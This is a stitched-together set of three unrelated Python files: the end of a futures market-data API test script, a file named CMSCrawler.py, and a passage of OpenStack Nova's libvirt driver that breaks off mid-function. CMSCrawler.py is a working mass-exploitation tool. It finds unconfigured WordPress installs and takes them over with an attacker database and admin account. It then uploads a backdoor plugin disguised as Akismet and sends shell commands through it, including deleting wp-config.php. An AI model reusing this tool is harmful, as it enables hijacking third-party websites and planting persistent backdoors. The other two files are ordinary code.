def onRtnForQuoteRsp(self, data):
"""行情推送"""
print_dict(data)
# Changjiang (broker front addresses)
md_addr = "tcp://124.74.10.62:47213"
td_addr = "tcp://124.74.10.62:43205"
# Galaxy (China Unicom line):
#md_addr = "tcp://114.255.82.175:31213"
#td_addr = "tcp://114.255.82.175:31205"
# Galaxy (China Telecom line)
#md_addr = "tcp://106.39.36.72:31213"
#td_addr = "tcp://106.39.36.72:31205"
user_id = "xxx"
user_pass = "xxx@123"
app_id = "xx.0.0"
auth_code = "xx"
broker_id = '4300'
#----------------------------------------------------------------------
def main():
"""主测试函数,出现堵塞时可以考虑使用sleep"""
reqid = 0
# 创建Qt应用对象,用于事件循环
#app = QtGui.QApplication(sys.argv)
# 创建API对象
api = TestMdApi()
# 在C++环境中创建MdApi对象,传入参数是希望用来保存.con文件的地址
print('create mdapi')
api.createFtdcMdApi('')
# 注册前置机地址
print('mdtest:registerFront:{}'.format(md_addr))
api.registerFront(md_addr)
# 初始化api,连接前置机
api.init()
sleep(0.5)
print('mdtest: login')
# 登陆
loginReq = {} # 创建一个空字典
loginReq['UserID'] = user_id # 参数作为字典键值的方式传入
loginReq['Password'] = user_pass # 键名和C++中的结构体成员名对应
loginReq['BrokerID'] = broker_id
reqid = reqid + 1 # 请求数必须保持唯一性
i = api.reqUserLogin(loginReq, 1)
counter = 0
while (True):
if api.is_connected:
break
sleep(1)
counter += 1
print('waiting {}'.format(counter))
if counter > 10:
print('time expired, connect fail, auth fail')
exit(0)
    ## Logout - test fails (feature not available)
    #reqid = reqid + 1
    #i = api.reqUserLogout({}, 1)
    #sleep(0.5)
    ## Safe exit - test passed
    #i = api.exit()
    ## Get the trading day - currently returns empty
    #day = api.getTradingDay()
    #print 'Trading Day is:' + str(day)
    #sleep(0.5)
    ## Subscribe to a contract - test passed
    print('subscribe')
    i = api.subscribeMarketData('sc1906')
    ## Unsubscribe from a contract - test passed
    #i = api.unSubscribeMarketData('IF1505')
    # Subscribe to for-quote (RFQ) - test passed
    #i = api.subscribeForQuoteRsp('IO1504-C-3900')
    # Unsubscribe from for-quote (RFQ) - test passed
    #i = api.unSubscribeForQuoteRsp('IO1504-C-3900')
if __name__ == '__main__':
    # Main program
thread = Thread(target=main, args=())
thread.start()
|
CMSCrawler.py
|
from multiprocessing import Process,Queue
import requests
import urllib3
from random import choice
import string
import shutil
import os
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#############################
########## Const ############
#############################
config_path = './config.json'
class CMS():
def __init__(self):
self._analized_domains = {}
self.config = {}
self._read_config_from_file()
self._fire_process()
def _read_config_from_file(self):
with open(config_path, 'r') as f:
self.config_content = f.read()
for line in self.config_content.split('\n'):
if len(line) == 0: continue
if line[0] != '#':
key = line.split('=')[0]
value = line.split('=')[1]
self.config[key] = value
def _fire_process(self):
self._queue = Queue()
self._process_list = []
for i in range(int(self.config['PROC_QUANTITY'])):
proc = Process(target=self._crawl, args=())
proc.daemon = True
proc.start()
self._process_list.append(proc)
def _crawl(self):
while True:
self.domain = self._queue.get(True)
if self.domain == 'KILL': return
if self.domain not in self._analized_domains.keys():
if self._is_cms_install_page(): self._attack_cms()
else: self._analized_domains[self.domain] = {'Quantity': 1}
def _is_cms_install_page(self):
cms_type = None
url = 'http://{}/'.format(self.domain)
try:
res = requests.get(url, timeout=5, verify=False)
except requests.exceptions.Timeout:
#print('[*] - Timeout..')
return False
except requests.exceptions.TooManyRedirects:
#print('[*] - To many redirects..')
#print(self.domain)
return False
except requests.exceptions.ConnectionError:
#print('[*] - ConnectionError..')
return False
except requests.exceptions.RequestException as e:
print('[*] - Exception, but I dont know :(')
print(e)
return False
except Exception as e:
print('[*] - {}'.format(self.domain))
print('[*] - Exception, but I dont know :(')
print(e)
if res.status_code == 200:
#print('[*] - Processing {}'.format(self.domain))
if '<title>WordPress › Setup Configuration File</title>' in res.text: cms_type = 'wordpress'
elif '<title>Joomla! Web Installer</title>' in res.text: cms_type = 'joomla'
elif 'Choose language | Drupal' in res.text: cms_type = 'drupal_8'
elif 'Select an installation profile' in res.text: cms_type = 'drupal_7'
elif '<p>LocalSettings.php not found.</p>' in res.text: cms_type = 'mediawiki'
elif '<title>Installing TYPO3 CMS</title>' in res.text: cms_type = 'typo3'
elif '<h2>Welcome to the Serendipity Installation</h2>' in res.text: cms_type = 'serendipity'
elif '<body ng-app="app" id="installation">' in res.text: cms_type = 'piwik'
elif '<a href="/phpbb/install/app.php/install">Install</a>' in res.text: cms_type = 'phpbb'
elif 'config.php is missing or corrupt.' in res.text: cms_type = 'textpattern'
#www-auth header to authenticate (basic auth)
elif res.status_code == 401: x=0
#Unauthorized
elif res.status_code == 403: x=0
#page not found (keep trying...)
elif res.status_code == 404: x=0
#Server internal errors (keep trying...)
elif res.status_code == 500: x=0
elif res.status_code == 501: x=0
elif res.status_code == 503: x=0
else: x=0
if cms_type is None: return False
print('[*] - CMS Type is {}'.format(cms_type))
print('[*] - {}'.format(self.domain))
if cms_type is 'wordpress': return True
else: return False
#return True
def _attack_cms(self):
payload_post = {
'dbname': self.config['MYSQL_DB_NAME'],
'uname': self.config['MYSQL_USERNAME'],
'pwd': self.config['MYSQL_DB_PW'],
'dbhost': self.config['MYSQL_HOST'],
'prefix': 'wp_',
'language': 'en_US',
'submit': 'Submit'
}
res = requests.post('http://'+self.domain+'/wp-admin/setup-config.php',params={'step': 2}, data=payload_post)
if res.status_code != 200: return False
print(res.status_code)
payload_post = {
'weblog_title': 'test',
'user_name': self.config['WORDPRESS_ADM'],
'admin_password': self.config['WORDPRESS_ADM_PW'],
'pass1-text': self.config['WORDPRESS_ADM_PW'],
'admin_password2': self.config['WORDPRESS_ADM_PW'],
'admin_email': 'admin@gmail.com',
'Submit': 'Install WordPress',
'language': 'en_US'
}
res = requests.post('http://'+self.domain+'/wp-admin/install.php', params={'step': 2}, data=payload_post)
if res.status_code == 500 and 'Error establishing a database connection' in res.text:
print('[*] - Error al conectarse a la DB')
sys.exit(2)
payload_post = {
'log': self.config['WORDPRESS_ADM'],
'pwd': self.config['WORDPRESS_ADM_PW'],
'wp-submit': 'Log In',
'redirect_to': 'http://{}/wp-admin/'.format(self.domain),
'testcookie': 1
}
res = requests.post('http://'+self.domain+'/wp-login.php', data=payload_post)
cookies = res.cookies
r3 = requests.get('http://{}/wp-admin/plugin-install.php'.format(self.domain), cookies=cookies)
look_for = 'name="_wpnonce" value="'
try:
nonceText = r3.text.split(look_for, 1)[1]
nonce = nonceText[0:10]
except:
print("Didn't find a CSRF token, check the URL and/or credentials.")
sys.exit(2)
uploaddir = 'akismet'
zipped_file = self._zip_plugin()
files = {
'pluginzip': (uploaddir + '.zip', open(zipped_file, 'rb')),
'_wpnonce': (None, nonce),
'_wp_http_referer': (None, self.domain + '/wp-admin/plugin-install.php?tab=upload'),
'install-plugin-submit': (None,'Install Now')
}
r4 = requests.post('http://'+self.domain+'/wp-admin/update.php',
files=files,
params={'action': 'upload-plugin'},
cookies=cookies)
if r4.status_code == 200:
print("Backdoor uploaded!")
if "Plugin installed successfully" in r4.text:
print("Plugin installed successfully")
if "Destination folder already exists" in r4.text:
print("Destination folder already exists")
self._remove_wp_config_file()
os.remove(zipped_file)
return True
def _send_cmd_shell(self,params):
for x in range(1,10):
r = requests.get('http://'+self.domain+'/wp-content/plugins/akismet-{}/class.akismet-plug.php'.format(str(x)), params=params)
if r.status_code == 200: return r
def _get_default_params_for_shell(self):
return {
'cmdexe': '',
'path': self.config['DEFAULT_PATH'],
'username': self.config['SHELL_USER'],
'password': self.config['SHELL_PW']
}
def _remove_wp_config_file(self):
params = self._get_default_params_for_shell()
params['cmdexe'] = 'rm -f ./wp-config.php'
self._send_cmd_shell(params)
def _zip_plugin(self):
file = '/tmp/akismet'
try: os.remove(file)
except: print('[*] - NoFile {}'.format(file))
shutil.copyfile(self.new_shell_file, self.config['PLUGIN_FILE_INFECT'])
print(shutil.make_archive(file, 'zip', self.config['PLUGIN_UPLOAD']))
os.remove(self.new_shell_file)
return file+'.zip'
def process(self,domain):
self._queue.put(domain)
|
driver.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
**Related Flags**
:libvirt_type: Libvirt domain type. Can be kvm, qemu, uml, xen
(default: kvm).
:libvirt_uri: Override for the default libvirt URI (depends on libvirt_type).
:libvirt_disk_prefix: Override the default disk prefix for the devices
attached to a server.
:rescue_image_id: Rescue ami image (None = original image).
:rescue_kernel_id: Rescue aki image (None = original image).
:rescue_ramdisk_id: Rescue ari image (None = original image).
:injected_network_template: Template file for injected network
:allow_same_net_traffic: Whether to allow in project network traffic
"""
import errno
import eventlet
import functools
import glob
import os
import shutil
import socket
import sys
import tempfile
import time
import uuid
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
from xml.dom import minidom
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import instance_types
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common.notifier import api as notifier
from nova import utils
from nova import version
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import netutils
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
default=None,
help='Rescue ami image'),
cfg.StrOpt('rescue_kernel_id',
default=None,
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
default=None,
help='Rescue ari image'),
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
cfg.BoolOpt('libvirt_inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('libvirt_inject_key',
default=True,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('libvirt_inject_partition',
default=1,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
default=None,
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.StrOpt('libvirt_vif_driver',
default='nova.virt.libvirt.vif.LibvirtGenericVIFDriver',
help='The libvirt VIF driver to configure the VIFs.'),
cfg.ListOpt('libvirt_volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('libvirt_disk_prefix',
default=None,
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on libvirt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('libvirt_wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.BoolOpt('libvirt_nonblocking',
default=True,
help='Use a separated OS thread pool to realize non-blocking'
' libvirt calls'),
cfg.StrOpt('libvirt_cpu_mode',
default=None,
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If libvirt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('libvirt_cpu_model',
default=None,
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'libvirt_cpu_mode="custom" and libvirt_type="kvm|qemu"'),
cfg.StrOpt('libvirt_snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: ["file=directsync","block=none"]'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
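# With the import above, DEFAULT_FIREWALL_DRIVER resolves to
# "nova.virt.libvirt.firewall.IptablesFirewallDriver".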
MAX_CONSOLE_BYTES = 102400
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 6)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_HOST_CPU_VERSION = (0, 9, 10)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 0, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._caps = None
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
vif_class = importutils.import_class(CONF.libvirt_vif_driver)
self.vif_driver = vif_class(self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt_volume_drivers, self)
self._host_state = None
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"writethrough",
"unsafe",
]
for mode_str in CONF.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_("Invalid cachemode %(cache_mode)s specified "
"for disk type %(disk_type)s.") % locals())
continue
self.disk_cachemodes[disk_type] = cache_mode
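        # Example: disk_cachemodes=["file=directsync", "block=none"] (the format
        # shown in the option help above) ends up as
        # {"file": "directsync", "block": "none"}.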
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
            # provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
def _munge_version(ver):
return ver[0] * 1000000 + ver[1] * 1000 + ver[2]
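            # e.g. (0, 9, 6) -> 9006 and (1, 0, 0) -> 1000000, so version tuples
            # can be compared as plain integers below.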
try:
if lv_ver is not None:
libvirt_version = self._conn.getLibVersion()
if libvirt_version < _munge_version(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = self._conn.getVersion()
if hypervisor_version < _munge_version(hv_ver):
return False
if hv_type is not None:
hypervisor_type = self._conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager."""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden."""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread."""
if self._event_queue is None:
LOG.debug("Event loop thread is not active, "
"discarding event %s" % event)
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events."""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
self.emit_event(event)
except native_Queue.Empty:
pass
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0."""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug("Starting green dispatch thread")
dispatch_thread = eventlet.spawn(self._dispatch_thread)
def init_host(self, host):
libvirt.virEventRegisterDefaultImpl()
if not self.has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.') %
locals())
self._init_events()
def _get_connection(self):
if not self._wrapped_conn or not self._test_connection():
LOG.debug(_('Connecting to libvirt: %s'), self.uri())
if not CONF.libvirt_nonblocking:
self._wrapped_conn = self._connect(self.uri(),
self.read_only)
else:
self._wrapped_conn = tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
self._connect, self.uri(), self.read_only)
try:
LOG.debug("Registering for lifecycle events %s" % str(self))
self._wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
            except Exception as e:
LOG.warn(_("URI %s does not support events"),
self.uri())
return self._wrapped_conn
_conn = property(_get_connection)
def _test_connection(self):
try:
self._wrapped_conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() == libvirt.VIR_ERR_SYSTEM_ERROR and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug(_('Connection to libvirt broke'))
return False
raise
@staticmethod
def uri():
if CONF.libvirt_type == 'uml':
uri = CONF.libvirt_uri or 'uml:///system'
elif CONF.libvirt_type == 'xen':
uri = CONF.libvirt_uri or 'xen:///'
elif CONF.libvirt_type == 'lxc':
uri = CONF.libvirt_uri or 'lxc:///'
else:
uri = CONF.libvirt_uri or 'qemu:///system'
return uri
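        # e.g. with no explicit libvirt_uri: uml -> 'uml:///system',
        # xen -> 'xen:///', lxc -> 'lxc:///', anything else (kvm/qemu)
        # -> 'qemu:///system'.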
@staticmethod
def _connect(uri, read_only):
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
LOG.warning(
_("Can not handle authentication request for %d credentials")
% len(creds))
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
_connect_auth_cb,
None]
try:
if read_only:
return libvirt.openReadOnly(uri)
else:
return libvirt.openAuth(uri, auth, 0)
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
notifier.notify(nova_context.get_admin_context(),
notifier.publisher_id('compute'),
'compute.libvirt.error',
notifier.ERROR,
payload)
pass
def get_num_instances(self):
"""Efficient override of base instance_exists method."""
return self._conn.numOfDomains()
def instance_exists(self, instance_name):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance_name)
return True
except exception.NovaException:
return False
def legacy_nwinfo(self):
return True
# TODO(Shrews): Remove when libvirt Bugzilla bug # 836647 is fixed.
def list_instance_ids(self):
if self._conn.numOfDomains() == 0:
return []
return self._conn.listDomainsID()
def list_instances(self):
names = []
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._conn.lookupByID(domain_id)
names.append(domain.name())
except libvirt.libvirtError:
# Instance was deleted while listing... ignore it
pass
# extend instance list to contain also defined domains
names.extend([vm for vm in self._conn.listDefinedDomains()
if vm not in names])
return names
def list_instance_uuids(self):
return [self._conn.lookupByName(name).UUIDString()
for name in self.list_instances()]
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for (network, mapping) in network_info:
self.vif_driver.plug(instance, (network, mapping))
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
for (network, mapping) in network_info:
self.vif_driver.unplug(instance, (network, mapping))
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
if state == power_state.SHUTDOWN:
is_okay = True
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_("Error from libvirt during destroy. "
"Code=%(errcode)s Error=%(e)s") %
locals(), instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.NotFound:
LOG.error(_("During wait destroy, instance disappeared."),
instance=instance)
raise utils.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_("Instance destroyed successfully."),
instance=instance)
raise utils.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
                # this may be an endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise utils.LoopingCallDone()
kwargs = {'is_running': False}
timer = utils.FixedIntervalLoopingCall(_wait_for_destroy, old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_("Going to destroy instance again."), instance=instance)
self._destroy(instance)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
self._destroy(instance)
self._cleanup(instance, network_info, block_device_info, destroy_disks)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.NotFound:
virt_dom = None
if virt_dom:
try:
try:
